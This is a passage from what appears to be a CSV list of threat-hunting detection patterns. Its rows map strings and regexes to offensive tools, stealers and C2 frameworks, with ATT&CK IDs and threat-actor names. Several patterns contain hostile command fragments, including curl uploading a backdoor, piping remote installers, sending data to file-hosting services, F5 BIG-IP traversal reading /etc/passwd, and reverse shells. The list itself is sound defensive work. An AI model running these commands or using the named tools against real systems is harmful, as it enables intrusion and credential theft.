T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","39187" "*cube0x0/MiniDump*",".{0,1000}cube0x0\/MiniDump.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","39188" "*cube0x0/MiniDump*",".{0,1000}cube0x0\/MiniDump.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - 
T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","39189" "*cube0x0/SharpMapExec*",".{0,1000}cube0x0\/SharpMapExec.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","39190" "*cuddlephish*stealer.js",".{0,1000}cuddlephish.{0,1000}stealer\.js","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","39191" "*cuddlephish-main*",".{0,1000}cuddlephish\-main.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","39192" "*CUPLIS BYPASSS SHELL*",".{0,1000}CUPLIS\sBYPASSS\sSHELL.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","39193" "*curl * --upload-file backdoor.php 
-v*",".{0,1000}curl\s.{0,1000}\s\-\-upload\-file\sbackdoor\.php\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","39194" "*curl --connect-timeout 3.14 -s ifconfig.me*",".{0,1000}curl\s\-\-connect\-timeout\s3\.14\s\-s\sifconfig\.me.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","0","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","39195" "*curl -F * https://*.gofile.io/uploadFile*",".{0,1000}curl\s\-F\s.{0,1000}\shttps\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","39196" "*curl -fsSL https://gsocket.io/x*",".{0,1000}curl\s\-fsSL\shttps\:\/\/gsocket\.io\/x.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39197" "*curl -fsSL https://tiny.cc/gsinst*",".{0,1000}curl\s\-fsSL\shttps\:\/\/tiny\.cc\/gsinst.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39198" "*curl http*/handling-form-submission-complete/rce.jsp*",".{0,1000}curl\shttp.{0,1000}\/handling\-form\-submission\-complete\/rce\.jsp.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","N/A","4","311","236","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z","39199" "*curl http://172.23.0.1:1337/main*",".{0,1000}curl\shttp\:\/\/172\.23\.0\.1\:1337\/main.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39201" "*curl https://curlshell*",".{0,1000}curl\shttps\:\/\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","39206" "*curl 
https://github.com/antoniomika.key*",".{0,1000}curl\shttps\:\/\/github\.com\/antoniomika\.key.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","39207" "*curl -L -o ahk.exe https://github.com/AutoHotkey/*",".{0,1000}curl\s\-L\s\-o\sahk\.exe\shttps\:\/\/github\.com\/AutoHotkey\/.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","39209" "*curl -L powerview.sh *",".{0,1000}curl\s\-L\spowerview\.sh\s.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#linux","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","39210" "*curl -Ns telnet://*",".{0,1000}curl\s\-Ns\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","39211" "*curl --output 
*http*/tomcatwar.jsp?*",".{0,1000}curl\s\-\-output\s.{0,1000}http.{0,1000}\/tomcatwar\.jsp\?.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","39212" "*curl -s -N http://127.0.0.1:4040/api/tunnels*",".{0,1000}curl\s\-s\s\-N\shttp\:\/\/127\.0\.0\.1\:4040\/api\/tunnels.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","39213" "*curl -s -o test.elf http://0.0.0.0:8001/test.elf*",".{0,1000}curl\s\-s\s\-o\stest\.elf\shttp\:\/\/0\.0\.0\.0\:8001\/test\.elf.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","0","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","39214" "*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*",".{0,1000}curl\s\-sk\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/util\/getTabSet\.jsp\?tabId\=Vulnerable.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39215" "*curl -v -k 'https://*/tmui/login.jsp/.. 
/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","39216" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","39217" "*curl -x socks5h://127.0.0.1:*",".{0,1000}curl\s\-x\ssocks5h\:\/\/127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","39218" "*curl*/tmp/exploit-dirty-pipe*",".{0,1000}curl.{0,1000}\/tmp\/exploit\-dirty\-pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","39220" "*curlshell.py*",".{0,1000}curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","39222" "*cursed chrome",".{0,1000}cursed\schrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39225" "*cursed cookies",".{0,1000}cursed\scookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39226" "*CursedChrome API server is now listening on port*",".{0,1000}CursedChrome\sAPI\sserver\sis\snow\slistening\son\sport.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","39227" "*CursedChrome WebSocket server is now running on 
port*",".{0,1000}CursedChrome\sWebSocket\sserver\sis\snow\srunning\son\sport.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","39228" "*CursedChrome-master.zip*",".{0,1000}CursedChrome\-master\.zip.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","39229" "*Cursors\cursorinit.vbs*",".{0,1000}Cursors\\cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","39230" "*custom_payload_generator.*",".{0,1000}custom_payload_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","N/A","10","10","149","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z","39231" "*CustomKeyboardLayoutPersistence*",".{0,1000}CustomKeyboardLayoutPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39232" "*customWmiExec*wmiexec.py*",".{0,1000}customWmiExec.{0,1000}wmiexec\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","39233" "*CVE-*.bash*",".{0,1000}CVE\-.{0,1000}\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation 
tool","https://github.com/gottburgm/Exploits","1","1","#linux","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39235" "*CVE-*.bat*",".{0,1000}CVE\-.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39236" "*CVE-*.bin*",".{0,1000}CVE\-.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39237" "*CVE-*.c*",".{0,1000}CVE\-.{0,1000}\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39238" "*CVE-*.com*",".{0,1000}CVE\-.{0,1000}\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39239" "*CVE-*.cpp*",".{0,1000}CVE\-.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39240" "*CVE-*.exe*",".{0,1000}CVE\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - 
T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39241" "*CVE-*.git*",".{0,1000}CVE\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39242" "*CVE-*.msi*",".{0,1000}CVE\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39243" "*CVE-*.pl*",".{0,1000}CVE\-.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39244" "*CVE-*.ps1*",".{0,1000}CVE\-.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39245" "*CVE-*.py*",".{0,1000}CVE\-.{0,1000}\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39246" 
"*CVE-*.reg*",".{0,1000}CVE\-.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39247" "*CVE-*.run*",".{0,1000}CVE\-.{0,1000}\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39248" "*CVE-*.sh*",".{0,1000}CVE\-.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39249" "*CVE-*.vb*",".{0,1000}CVE\-.{0,1000}\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39250" "*CVE-*.vbe*",".{0,1000}CVE\-.{0,1000}\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","N/A","2","193","106","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z","39251" "*CVE-*.vbs*",".{0,1000}CVE\-.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
